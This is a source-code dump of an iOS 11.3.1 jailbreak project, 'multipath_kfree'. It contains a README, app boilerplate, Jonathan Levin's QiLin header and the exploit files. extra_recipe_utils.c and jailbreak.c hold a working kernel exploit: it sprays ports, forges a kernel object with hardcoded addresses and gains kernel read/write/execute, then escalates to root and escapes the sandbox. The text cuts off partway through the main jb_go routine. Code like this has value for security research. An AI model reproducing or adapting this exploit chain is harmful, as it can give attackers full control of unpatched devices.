[ { "path": "README.md", "content": "# multipath_kfree\n\n# DISABLE SIRI BEFORE RUNNING \nlow effort jb for iOS 11.3.1 by [@jaakerblom](https://twitter.com/jaakerblom)\n\nSets up kernel RWX with clear API\n\nTested on iPhone X only\n\nUses [QiLin](http://newosxbook.com/QiLin/) by Jonathan Levin\n\nThanks to:\n * Everyone including Stefan Esser\n\nSpecial thanks to:\n * [@i41nbeer](https://twitter.com/i41nbeer) \n * [@doadam](https://twitter.com/doadam)\n * Mr. 0xd503201f\n * [@Morpheus______](https://twitter.com/Morpheus______) \n\nNote about Siri: Siri has the multipath entitlement and seems to be using multipath sockets. The current code does not account for this as it aspects a new page for the multipath socket structs, therefore you either have to disable Siri or change the heap logic before running. \n" }, { "path": "extra_recipe/AppDelegate.h", "content": "//\n// AppDelegate.h\n// multipath_kfree\n//\n// Created by q on 6/1/18.\n// Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#import \n\n@interface AppDelegate : UIResponder \n\n@property (strong, nonatomic) UIWindow *window;\n\n\n@end\n\n" }, { "path": "extra_recipe/AppDelegate.m", "content": "//\n// AppDelegate.m\n// multipath_kfree\n//\n// Created by q on 6/1/18.\n// Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#import \"AppDelegate.h\"\n\n@interface AppDelegate ()\n\n@end\n\n@implementation AppDelegate\n\n\n- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {\n // Override point for customization after application launch.\n return YES;\n}\n\n\n- (void)applicationWillResignActive:(UIApplication *)application {\n // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.\n // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.\n}\n\n\n- (void)applicationDidEnterBackground:(UIApplication *)application {\n // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.\n // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.\n}\n\n\n- (void)applicationWillEnterForeground:(UIApplication *)application {\n // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.\n}\n\n\n- (void)applicationDidBecomeActive:(UIApplication *)application {\n // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.\n}\n\n\n- (void)applicationWillTerminate:(UIApplication *)application {\n // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.\n}\n\n\n@end\n" }, { "path": "extra_recipe/AppDelegate.swift", "content": "//\n// AppDelegate.swift\n// extra_recipe\n//\n// Created by Ian Beer on 1/23/17.\n// Copyright © 2017 Ian Beer. All rights reserved.\n//\n\nimport UIKit\n\n@UIApplicationMain\nclass AppDelegate: UIResponder, UIApplicationDelegate {\n\n var window: UIWindow?\n\n\n func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) -> Bool {\n // Override point for customization after application launch.\n return true\n }\n\n func applicationWillResignActive(_ application: UIApplication) {\n // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.\n // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.\n }\n\n func applicationDidEnterBackground(_ application: UIApplication) {\n // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.\n // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.\n }\n\n func applicationWillEnterForeground(_ application: UIApplication) {\n // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.\n }\n\n func applicationDidBecomeActive(_ application: UIApplication) {\n // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.\n }\n\n func applicationWillTerminate(_ application: UIApplication) {\n // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.\n }\n\n\n}\n\n" }, { "path": "extra_recipe/Assets.xcassets/AppIcon.appiconset/Contents.json", "content": "{\n \"images\" : [\n {\n \"idiom\" : \"iphone\",\n \"size\" : \"20x20\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"iphone\",\n \"size\" : \"20x20\",\n \"scale\" : \"3x\"\n },\n {\n \"idiom\" : \"iphone\",\n \"size\" : \"29x29\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"iphone\",\n \"size\" : \"29x29\",\n \"scale\" : \"3x\"\n },\n {\n \"idiom\" : \"iphone\",\n \"size\" : \"40x40\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"iphone\",\n \"size\" : \"40x40\",\n \"scale\" : \"3x\"\n },\n {\n \"idiom\" : \"iphone\",\n \"size\" : \"60x60\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"iphone\",\n \"size\" : \"60x60\",\n \"scale\" : \"3x\"\n },\n {\n \"idiom\" : \"ipad\",\n \"size\" : \"20x20\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"ipad\",\n \"size\" : \"20x20\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"ipad\",\n \"size\" : \"29x29\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"ipad\",\n \"size\" : \"29x29\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"ipad\",\n \"size\" : \"40x40\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"ipad\",\n \"size\" : \"40x40\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"ipad\",\n \"size\" : \"76x76\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"ipad\",\n \"size\" : \"76x76\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"ipad\",\n \"size\" : \"83.5x83.5\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"ios-marketing\",\n \"size\" : \"1024x1024\",\n \"scale\" : \"1x\"\n }\n ],\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}" }, { "path": "extra_recipe/Assets.xcassets/Contents.json", "content": "{\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}" }, { "path": "extra_recipe/Base.lproj/LaunchScreen.storyboard", "content": "\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n" }, { "path": "extra_recipe/Base.lproj/Main.storyboard", "content": "\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n" }, { "path": "extra_recipe/Info.plist", "content": "\n\n\n\n\tCFBundleDevelopmentRegion\n\t$(DEVELOPMENT_LANGUAGE)\n\tCFBundleExecutable\n\t$(EXECUTABLE_NAME)\n\tCFBundleIdentifier\n\t$(PRODUCT_BUNDLE_IDENTIFIER)\n\tCFBundleInfoDictionaryVersion\n\t6.0\n\tCFBundleName\n\t$(PRODUCT_NAME)\n\tCFBundlePackageType\n\tAPPL\n\tCFBundleShortVersionString\n\t1.0\n\tCFBundleVersion\n\t1\n\tLSRequiresIPhoneOS\n\t\n\tUILaunchStoryboardName\n\tLaunchScreen\n\tUIMainStoryboardFile\n\tMain\n\tUIRequiredDeviceCapabilities\n\t\n\t\tarmv7\n\t\n\tUISupportedInterfaceOrientations\n\t\n\t\tUIInterfaceOrientationPortrait\n\t\tUIInterfaceOrientationLandscapeLeft\n\t\tUIInterfaceOrientationLandscapeRight\n\t\n\tUISupportedInterfaceOrientations~ipad\n\t\n\t\tUIInterfaceOrientationPortrait\n\t\tUIInterfaceOrientationPortraitUpsideDown\n\t\tUIInterfaceOrientationLandscapeLeft\n\t\tUIInterfaceOrientationLandscapeRight\n\t\n\n\n" }, { "path": "extra_recipe/QiLin.h", "content": "//\n// jjt.h\n// QiLin\n//\n// Created by JL on 12/7/17.\n// Copyright © 2017 NewOSXBook. All rights reserved.\n\n// Revision 3: Added spawnAndPlatformize(),\n// moved to posix_spawn() implementation for exec() family\n// actually exported the set*Reporter functions (formerly ErrorHandler.. etc -\n// \"Reporter\" is more accurate, because they allow you to propagate messages to\n// a GUI.\n//\n\n#ifndef qilin_h./Developer/Xcode/DerivedData/LiberiOS-eprgauhokruyejdrgttigzlnmnde/Build/Intermediates.noindex/LiberiOS.build\n#define qilin_h\n#include \n#include \n#include \n\n\nchar *getMachine (void);\nchar *getOSVer(void);\n\n\n// MUST call this first\n\nint initQiLin (mach_port_t TFP0, uint64_t KernelBase);\n\n// System wide effects\n//\nint remountRootFS (void);\npid_t execCommand(char *Cmd, char *Arg1, char *Arg2, char *Arg3, char *Arg4, char *Arg5 , int Flags);\nint execCommandAndWait(char *Cmd, char *Arg1, char *Arg2, char *Arg3, char *Arg4, char *Arg5);\n\nint setTFP0AsHostSpecialPort4 (void);\n\n// 1/17/18 - This is super useful\nint spawnAndPlatformize (char *AmfidebPath, char *Arg1, char *Arg2, char *Arg3 , char *Arg4, char *Arg5);\n\n\nint moveFileFromAppDir (char *File, char *Dest);\nint disableAutoUpdates(void);\n\n// Code signing\n\n// Will set AMFId's exception ports and thereby disable code signing\n//\nint castrateAmfid (void);\n\n// Utility function - you probably won't need this directly.\n#define ALGORITHM_SHA256 2\n#define ALGORITHM_SHA1 1\nchar *cdHashOfFile(char *fileName,int Algorithm); // Calculate CDHash of a given Mach-O (for messing with AMFI)\n\n\n\n// Kernel Memory access (wrappers over kernel_task send right)\nuint64_t findKernelSymbol (char *Symbol);\nvoid setKernelSymbol (char *Symbol, uint64_t Address);\n\nint readKernelMemory(uint64_t Address, uint64_t Len, void **To);\nint writeKernelMemory(uint64_t Address, uint64_t Len, void *From);\n\n// Not recommended, but doable: Bestow task port of Pid in TargetPid\nmach_port_t task_for_pid_in_kernel (pid_t Pid, pid_t TargetPid);\n\n// Process manipulation functions\n\n// Finds the address of struct proc for this pid_t in kernel memory.\nuint64_t getProcStructForPid(pid_t);\n\n\n// Finds the pid of a process given its (base) name. Note this will only\n// work on processes you are the owner of (or all, if root) - this is intentional\npid_t findPidOfProcess (char *ProcName) ;\n\nint setCSFlagsForProcAtAddr(uint64_t ProcStructAddr, int Flags, int Set);\nint setCSFlagsForPid (pid_t Whom);\nint platformizePid(pid_t Whom);\nint rootifyPid(pid_t Whom);\nint ShaiHuludPid (pid_t Whom);\nint unShaiHuludPid (pid_t Whom);\n\n\n\n\nuint64_t borrowEntitlementsFromDonor(char *UnwittingDonor, char *Arg);\n// By request :-)\nuint64_t borrowEntitlementsFromPid(pid_t Pid);\n\n\n\n// Presently, limited to two entitlements, and assumed boolean (true)\nint entitlePidWithKernelEnts (pid_t Whom, char *Ent1, char *Ent2);\n\n// Convenience functions - do all the above , but on my process\n\nint platformizeMe (void);\nint rootifyMe(void);\n\n// Escape sandbox:\n// call with 0 to assume kernel cred, else specify value. Will return origCreds\nuint64_t ShaiHuludMe(uint64_t OtherCredsOr0ForKernelCreds);\nvoid unShaiHuludMe(uint64_t OrigCreds);\nint entitleMe(char *entitlementString);\n\nuint64_t getKernelCredAddr (void);\n\n\n/// Launchd handling utilities - just for you @launchderp :-)\nint makeLaunchdPlist (char *PlistName, char *Program, char *ProgramArguments, char *StandardOutputPath, char *StandardErrorPath, int RunAtLoad);\nint launjctlLaunchdPlist(char *Name);\n\n// I use these internally, not sure anyone else would need them\nint launjctlPrintSystem (void);\nint launjctlDumpState(void);\n\n\n// This one is still in progress. Don't use it please.\nint movePortToPid(mach_port_t PortMoved, pid_t Pid, mach_port_name_t Name);\nint spawnJailbreakServer (char *Name, mach_port_t TFP0, mach_port_name_t NameInTarget);\n\n// UI Support:\n// Provide status, error and debug print outs to user,\n// which may be redirected to GUI views, etc.\n// Default implmenentations are NSLog.\n\ntypedef void (status_func) (char *,...);\nvoid setStatusReporter (status_func *Func);\nvoid setErrorReporter (status_func *Func);\nvoid setDebugReporter (status_func *Func);\n\n\n// Utility functions you probably won't need unless you want to do your own debugging\nvoid hexDump(void *Mem, int Len, uint64_t Addr);\nvoid dumpARMThreadState64(_STRUCT_ARM_THREAD_STATE64 *old_state);\n\n// Even more Internal/advanced use:\nuint64_t findKernelTask (void);\nuint64_t findMyProcStructInKernelMemory(void); // For other advanced uses I haven't provided already\n\n\n#endif /* qilin_h */\n" }, { "path": "extra_recipe/README", "content": "\n" }, { "path": "extra_recipe/ViewController.h", "content": "//\n// ViewController.h\n// multipath_kfree\n//\n// Created by q on 6/1/18.\n// Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#import \n\n@interface ViewController : UIViewController\n\n\n@end\n\n" }, { "path": "extra_recipe/ViewController.m", "content": "//\n// ViewController.m\n// multipath_kfree\n//\n// Created by q on 6/1/18.\n// Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#import \"ViewController.h\"\n\n#include \"jailbreak.h\"\n\n@interface ViewController ()\n\n@end\n\n@implementation ViewController\n\n- (void)viewDidLoad {\n [super viewDidLoad];\n // Do any additional setup after loading the view, typically from a nib.\n jb_go();\n}\n\n\n- (void)didReceiveMemoryWarning {\n [super didReceiveMemoryWarning];\n // Dispose of any resources that can be recreated.\n}\n\n\n@end\n" }, { "path": "extra_recipe/ViewController.swift", "content": "//\n// ViewController.swift\n// extra_recipe\n//\n// Created by Ian Beer on 1/23/17.\n// Copyright © 2017 Ian Beer. All rights reserved.\n//\n\nimport UIKit\n\nclass ViewController: UIViewController {\n\n override func viewDidLoad() {\n super.viewDidLoad()\n DispatchQueue.main.async(execute: { () -> Void in\n jb_go();\n })\n }\n\n\n override func didReceiveMemoryWarning() {\n super.didReceiveMemoryWarning()\n // Dispose of any resources that can be recreated.\n }\n\n\n}\n\n" }, { "path": "extra_recipe/extra_recipe-Bridging-Header.h", "content": "//\n// Use this file to import your target's public headers that you would like to expose to Swift.\n//\n\nint jb_go();\n" }, { "path": "extra_recipe/extra_recipe.entitlements", "content": "\n\n\n\n\tcom.apple.developer.networking.multipath\n\t\n\n\n" }, { "path": "extra_recipe/extra_recipe_utils.c", "content": "// This code is lifted from extra_recipe by Ian Beer of Google Project Zero:\n// https://bugs.chromium.org/p/project-zero/issues/detail?id=1004\n#include \n#include \n#include \n#include \n#include \n\n#include \n#include \n#include \n#include \n#include \n\n#include \n#include \n\n#include \n\n// IOKit stuff\n\n#define kIOMasterPortDefault MACH_PORT_NULL\n#define IO_OBJECT_NULL MACH_PORT_NULL\n\ntypedef mach_port_t io_iterator_t;\ntypedef mach_port_t io_service_t;\ntypedef mach_port_t io_connect_t;\ntypedef mach_port_t io_object_t;\ntypedef char io_name_t[128];\n\n\nCFMutableDictionaryRef\nIOServiceMatching(const char* name );\n\nkern_return_t\nIOServiceGetMatchingServices(\n mach_port_t masterPort,\n CFDictionaryRef matching,\n io_iterator_t * existing );\n\nio_service_t\nIOServiceGetMatchingService(\n mach_port_t masterPort,\n CFDictionaryRef matching);\n\nio_object_t\nIOIteratorNext(\n io_iterator_t iterator );\n\nkern_return_t\nIOObjectGetClass(\n io_object_t object,\n io_name_t className );\n\nkern_return_t\nIOServiceOpen(\n io_service_t service,\n task_port_t owningTask,\n uint32_t type,\n io_connect_t * connect );\n\nkern_return_t\nIOServiceClose(\n io_connect_t connect );\n\nkern_return_t\nIOObjectRelease(\n io_object_t object );\n\nkern_return_t\nIOConnectGetService(\n io_connect_t connect,\n io_service_t * service );\n\n// mach_vm protos\n\nkern_return_t mach_vm_allocate\n(\n vm_map_t target,\n mach_vm_address_t *address,\n mach_vm_size_t size,\n int flags\n );\n\nkern_return_t mach_vm_deallocate\n(\n vm_map_t target,\n mach_vm_address_t address,\n mach_vm_size_t size\n );\n\nmach_port_t prealloc_port(int size) {\n kern_return_t err;\n mach_port_qos_t qos = {0};\n qos.prealloc = 1;\n qos.len = size;\n \n mach_port_name_t name = MACH_PORT_NULL;\n \n err = mach_port_allocate_full(mach_task_self(),\n MACH_PORT_RIGHT_RECEIVE,\n MACH_PORT_NULL,\n &qos,\n &name);\n \n if (err != KERN_SUCCESS) {\n printf(\"pre-allocated port allocation failed: %s\\n\", mach_error_string(err));\n return MACH_PORT_NULL;\n }\n \n return (mach_port_t)name;\n}\n\n\nio_service_t service = MACH_PORT_NULL;\n\nio_connect_t alloc_userclient() {\n kern_return_t err;\n if (service == MACH_PORT_NULL) {\n service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(\"AGXAccelerator\"));\n \n if (service == IO_OBJECT_NULL){\n printf(\"unable to find service\\n\");\n return 0;\n }\n }\n \n io_connect_t conn = MACH_PORT_NULL;\n err = IOServiceOpen(service, mach_task_self(), 5, &conn); // AGXCommandQueue, 0xdb8\n if (err != KERN_SUCCESS){\n printf(\"unable to get user client connection\\n\");\n return 0;\n }\n \n return conn;\n}\n\n// each time we get an exception message copy the first 32 registers into this buffer\nuint64_t crash_buf[32] = {0}; // use the 32 general purpose ARM64 registers\n\n// implemented in load_regs_and_crash.s\nvoid load_regs_and_crash(uint64_t* buf);\n\n// (actually only 30 controlled qwords for the send)\nstruct thread_args {\n uint64_t buf[32];\n mach_port_t exception_port;\n};\n\nvoid* do_thread(void* arg) {\n struct thread_args* args = (struct thread_args*)arg;\n uint64_t buf[32];\n memcpy(buf, args->buf, sizeof(buf));\n \n kern_return_t err;\n err = thread_set_exception_ports(\n mach_thread_self(),\n EXC_MASK_ALL,\n args->exception_port,\n EXCEPTION_STATE, // we want to receive a catch_exception_raise_state message\n ARM_THREAD_STATE64);\n \n free(args);\n \n load_regs_and_crash(buf);\n printf(\"no crashy?\");\n return NULL;\n}\n\nvoid prepare_prealloc_port(mach_port_t port) {\n mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);\n}\n\nint port_has_message(mach_port_t port) {\n kern_return_t err;\n mach_port_seqno_t msg_seqno = 0;\n mach_msg_size_t msg_size = 0;\n mach_msg_id_t msg_id = 0;\n mach_msg_trailer_t msg_trailer; // NULL trailer\n mach_msg_type_number_t msg_trailer_size = sizeof(msg_trailer);\n err = mach_port_peek(mach_task_self(),\n port,\n MACH_RCV_TRAILER_NULL,\n &msg_seqno,\n &msg_size,\n &msg_id,\n (mach_msg_trailer_info_t)&msg_trailer,\n &msg_trailer_size);\n \n return (err == KERN_SUCCESS);\n}\n\nuint8_t crash_stack[0x4000];\n\n// port needs to have a send right\nvoid send_prealloc_msg(mach_port_t port, uint64_t* buf, int n) {\n struct thread_args* args = malloc(sizeof(struct thread_args));\n memset(args, 0, sizeof(struct thread_args));\n memcpy(args->buf, buf, n*8);\n\n args->exception_port = port;\n \n // start a new thread passing it the buffer and the exception port\n pthread_t t;\n pthread_create(&t, NULL, do_thread, (void*)args);\n \n // associate the pthread_t with the port so that we can join the correct pthread\n // when we receive the exception message and it exits:\n // kern_return_t err = mach_port_set_context(mach_task_self(), port, (mach_port_context_t)t);\n //printf(\"set context\\n\");\n // wait until the message has actually been sent:\n while(!port_has_message(port)){;}\n \n thread_t thread = pthread_mach_thread_np(t);\n thread_terminate(thread); // leaks pthread structs, will destroy you eventually\n}\n\n// the returned pointer is only valid until the next call to this function\n// ownership is retained by this function\nuint64_t* receive_prealloc_msg(mach_port_t port) {\n uint8_t msg[1024];\n memset(msg, 0x00, sizeof(msg));\n mach_msg((mach_msg_header_t *)msg,\n MACH_RCV_MSG | MACH_MSG_TIMEOUT_NONE, // no timeout\n 0,\n 0x1000,\n port,\n 0,\n 0);\n \n memcpy(crash_buf, msg, sizeof(crash_buf));\n \n return &crash_buf[0];\n}\n\nint _kx_setup = 0;\nio_connect_t *_ucs = NULL;\nmach_port_t *_lazy_ports = NULL;\nuint64_t _kaslr_shift = 0;\nuint64_t _kernel_buffer_base = 0;\nio_connect_t *_uc = 0;\nmach_port_t _lazy_port = 0;\n\n\nstatic void _kx_find()\n{\n uint64_t kernel_base = 0xfffffff007004000 + _kaslr_shift;\n uint64_t osserializer_serialize = 0xfffffff0075468f8 + _kaslr_shift;\n uint64_t get_metaclass = 0xfffffff007548a24 + _kaslr_shift;\n uint64_t ret = get_metaclass + 8;\n uint64_t copyout = 0xfffffff0071f5280 + _kaslr_shift;\n volatile uint32_t feedfacf = 0;\n \n uint64_t r_obj[64];\n memset(r_obj, 0, sizeof(r_obj));\n r_obj[0] = _kernel_buffer_base+0x8; // fake vtable points 8 bytes into this object\n r_obj[1] = 0x20003; // refcount\n r_obj[2] = _kernel_buffer_base+0x48 - 0x18 - 8 + 0x10; // obj + 0x10 -> rdi (memmove dst)\n r_obj[3] = sizeof(uint32_t); // obj + 0x18 -> rsi (memmove src)\n r_obj[4] = osserializer_serialize; // obj + 0x20 -> fptr\n r_obj[5] = ret; // vtable + 0x20 (::retain)\n r_obj[6] = osserializer_serialize; // vtable + 0x28 (::release)\n r_obj[7] = 0x11; //\n r_obj[8] = get_metaclass; // vtable + 0x38 (::getMetaClass)\n \n r_obj[9] = kernel_base;\n r_obj[10] = &feedfacf;\n r_obj[11] = copyout;\n \n memmove((uint8_t *)r_obj + 0x10, r_obj, sizeof(r_obj) - 0x10);\n \n for (int i = 0; i < 1000; ++i) {\n send_prealloc_msg(_lazy_ports[i], (uint64_t *)r_obj, 30);\n }\n\n \n for (int i = 0; i < 1000; ++i) {\n io_service_t service;\n IOConnectGetService(_ucs[i], &service);\n if (feedfacf != 0) {\n _uc = _ucs[i];\n break;\n }\n }\n \n for (int i = 0; i < 1000; ++i) {\n receive_prealloc_msg(_lazy_ports[i]);\n }\n \n r_obj[9+2] = kernel_base + 1;\n \n int sent_count = 0;\n for (int i = 0; i < 1000; ++i) {\n send_prealloc_msg(_lazy_ports[i], (uint64_t *)r_obj, 30);\n \n io_service_t service;\n IOConnectGetService(_uc, &service);\n \n if (feedfacf != 0xfeedfacf) {\n _lazy_port = _lazy_ports[i];\n sent_count = i+1;\n break;\n }\n }\n \n for (int i = 0; i < sent_count; ++i) {\n receive_prealloc_msg(_lazy_ports[i]);\n }\n}\n\nvoid kx_setup(io_connect_t *ucs, mach_port_t *lazy_ports, uint64_t kaslr_shift, uint64_t kernel_buffer_base)\n{\n _ucs = ucs;\n _lazy_ports = lazy_ports;\n _kaslr_shift = kaslr_shift;\n _kernel_buffer_base = kernel_buffer_base;\n \n for (int i = 0; i < 1000; ++i) {\n prepare_prealloc_port(lazy_ports[i]);\n }\n \n _kx_find();\n}\n\nvoid kx3(uint64_t fptr, uint64_t arg0, uint64_t arg1, uint64_t arg2) {\n uint64_t osserializer_serialize = 0xfffffff0075468f8 + _kaslr_shift;\n uint64_t get_metaclass = 0xfffffff007548a24 + _kaslr_shift;\n uint64_t ret = get_metaclass + 8;\n uint64_t copyout = 0xfffffff0071f5280 + _kaslr_shift;\n \n uint64_t r_obj[64];\n memset(r_obj, 0, sizeof(r_obj));\n r_obj[0] = _kernel_buffer_base+0x8; // fake vtable points 8 bytes into this object\n r_obj[1] = 0x20003; // refcount\n r_obj[2] = _kernel_buffer_base+0x48 - 0x18 - 8 + 0x10; // obj + 0x10 -> rdi (memmove dst)\n r_obj[3] = arg2; // obj + 0x18 -> rsi (memmove src)\n r_obj[4] = osserializer_serialize; // obj + 0x20 -> fptr\n r_obj[5] = ret; // vtable + 0x20 (::retain)\n r_obj[6] = osserializer_serialize; // vtable + 0x28 (::release)\n r_obj[7] = 0x11; //\n r_obj[8] = get_metaclass; // vtable + 0x38 (::getMetaClass)\n \n r_obj[9] = arg0;\n r_obj[10] = arg1;\n r_obj[11] = fptr;\n \n memmove((uint8_t *)r_obj + 0x10, r_obj, sizeof(r_obj) - 0x10);\n \n send_prealloc_msg(_lazy_port, (uint64_t *)r_obj, 30);\n\n io_service_t service;\n IOConnectGetService(_uc, &service);\n \n receive_prealloc_msg(_lazy_port);\n}\n\nvoid kread(uint64_t addr, uint8_t *userspace, int n)\n{\n uint64_t copyout = 0xfffffff0071f5280 + _kaslr_shift;\n kx3(copyout, addr, userspace, n);\n}\n\nuint32_t kread32(uint64_t addr)\n{\n uint64_t copyout = 0xfffffff0071f5280 + _kaslr_shift;\n uint32_t value = 0;\n kx3(copyout, addr, (uint64_t)&value, sizeof(value));\n \n return value;\n}\n\nuint64_t kread64(uint64_t addr)\n{\n uint64_t copyout = 0xfffffff0071f5280 + _kaslr_shift;\n uint64_t value = 0;\n kx3(copyout, addr, (uint64_t)&value, sizeof(value));\n \n return value;\n}\n\nvoid kwrite(uint64_t addr, uint8_t *userspace, int n)\n{\n uint64_t copyin = 0xfffffff0071f5058 + _kaslr_shift;\n kx3(copyin, userspace, addr, n);\n}\n\nvoid kwrite32(uint64_t addr, uint32_t value)\n{\n uint64_t copyin = 0xfffffff0071f5058 + _kaslr_shift;\n kx3(copyin, &value, addr, sizeof(value));\n}\n\nvoid kwrite64(uint64_t addr, uint64_t value)\n{\n uint64_t copyin = 0xfffffff0071f5058 + _kaslr_shift;\n kx3(copyin, &value, addr, sizeof(value));\n}\n" }, { "path": "extra_recipe/extra_recipe_utils.h", "content": "//\n// extra_recipe_utils.h\n// multipath_kfree\n//\n// Created by John Åkerblom on 6/1/18.\n// Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#ifndef extra_recipe_utils_h\n#define extra_recipe_utils_h\n\n#include \n#include \n\nmach_port_t prealloc_port(int size);\nvoid prepare_prealloc_port(mach_port_t port);\nvoid send_prealloc_msg(mach_port_t port, uint64_t* buf, int n);\nuint64_t* receive_prealloc_msg(mach_port_t port);\n\ntypedef mach_port_t io_service_t;\ntypedef mach_port_t io_connect_t;\nio_connect_t alloc_userclient();\n\n// Kernel RWX\n\nvoid kx_setup(io_connect_t *ucs, mach_port_t *lazy_ports, uint64_t kaslr_shift, uint64_t kernel_buffer_base);\nvoid kx3(uint64_t fptr, uint64_t arg0, uint64_t arg1, uint64_t arg2);\n\nvoid kread(uint64_t addr, uint8_t *userspace, int n);\nuint32_t kread32(uint64_t addr);\nuint64_t kread64(uint64_t addr);\n\nvoid kwrite(uint64_t addr, uint8_t *userspace, int n);\nvoid kwrite32(uint64_t addr, uint32_t value);\nvoid kwrite64(uint64_t addr, uint64_t value);\n\n#endif /* extra_recipe_utils_h */\n" }, { "path": "extra_recipe/jailbreak.c", "content": "//\n// jailbreak.c\n// multipath_kfree\n//\n// Created by John Åkerblom on 6/1/18.\n// Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#include \"jailbreak.h\"\n#include \"extra_recipe_utils.h\"\n#include \"multipath_kfree.h\"\n#include \"QiLin.h\"\n\n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef AF_MULTIPATH\n#define AF_MULTIPATH 39\n#endif\n\n#define MP_SOCK_COUNT 0x10\n#define FIRST_PORTS_COUNT 100\n#define REFILL_PORTS_COUNT 100\n#define TOOLAZY_PORTS_COUNT 1000\n#define REFILL_USERCLIENTS_COUNT 1000\n#define MAX_PEEKS 30000\n\nstatic void _init_port_with_empty_msg(mach_port_t port)\n{\n uint8_t buf[256];\n memset(buf, 0x00, sizeof(buf));\n prepare_prealloc_port(port);\n send_prealloc_msg(port, (uint64_t *)buf, 30);\n}\n\nstatic int _is_port_corrupt(mach_port_t port)\n{\n kern_return_t err;\n mach_port_seqno_t msg_seqno = 0;\n mach_msg_size_t msg_size = 0;\n mach_msg_id_t msg_id = 0;\n mach_msg_trailer_t msg_trailer; // NULL trailer\n mach_msg_type_number_t msg_trailer_size = sizeof(msg_trailer);\n err = mach_port_peek(mach_task_self(),\n port,\n MACH_RCV_TRAILER_NULL,\n &msg_seqno,\n &msg_size,\n &msg_id,\n (mach_msg_trailer_info_t)&msg_trailer,\n &msg_trailer_size);\n \n if (msg_id && (msg_id != 0x962)) {\n return 1;\n }\n \n return 0;\n}\n\n\nstatic int __readKernelMemory(uint64_t Address, uint64_t Len, void **To)\n{\n void *mem = malloc(Len);\n kread(Address, mem, (int)Len);\n *To = mem;\n \n return (int)Len;\n}\n\nstatic int __writeKernelMemory(uint64_t Address, uint64_t Len, void *From)\n{\n kwrite(Address, From, (int)Len);\n \n return (int)Len;\n}\n\n// This will not enable all QiLin features - but enough for us\nvoid _init_tfp0less_qilin(uint64_t kaslr_shift)\n{\n uint64_t kernproc = 0xfffffff0076450a8 + kaslr_shift;\n uint64_t *m = (uint64_t *)mmap((void *)0x110000000, 0x4000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);\n \n *m = (uint64_t)__readKernelMemory;\n *(m + 1) = (uint64_t)__writeKernelMemory;\n *(m + 2) = kernproc;\n}\n\nvoid post_exploitation(uint64_t kernel_base, uint64_t kaslr_shift)\n{\n // Do Electra/QiLin/Saurik/etc stuff here\n \n printf(\"Post-exploitation stage, you have kernel RWX with a clear API now (extra_recipe_utils.h) so put whatever you want here (let me spell it out for you Reddit: this === tfp0). There is no more exploitation of any vulnerabilities to be done, only mitigation bypasses of which all are public. I called this a PoC because of lack of offsets, elegant techniques, testing, reliability, documentation and so on, not because it does nothing\");\n \n // kwx3(0xFFFFFFFF41414141, 0x111, 0x222, 0x333); // How to use API\n \n // Use Jonathan Levin's QiLin to elevate prvileges and escape sandbox.\n \n _init_tfp0less_qilin(kaslr_shift);\n initQiLin(0x1337, kernel_base);\n \n rootifyMe();\n ShaiHuludMe(0);\n \n printf(\"If all went well, sandbox escaped and root achieved now, test it if you want\\n\");\n}\n\nvoid jb_go(void)\n{\n io_connect_t refill_userclients[REFILL_USERCLIENTS_COUNT];\n mach_port_t first_ports[FIRST_PORTS_COUNT];\n mach_port_t refill_ports[REFILL_PORTS_COUNT];\n mach_port_t toolazy_ports[TOOLAZY_PORTS_COUNT];\n mach_port_t corrupt_port = 0;\n uint64_t contained_port_addr = 0;\n uint8_t *recv_buf = NULL;\n uint8_t send_buf[1024];\n \n 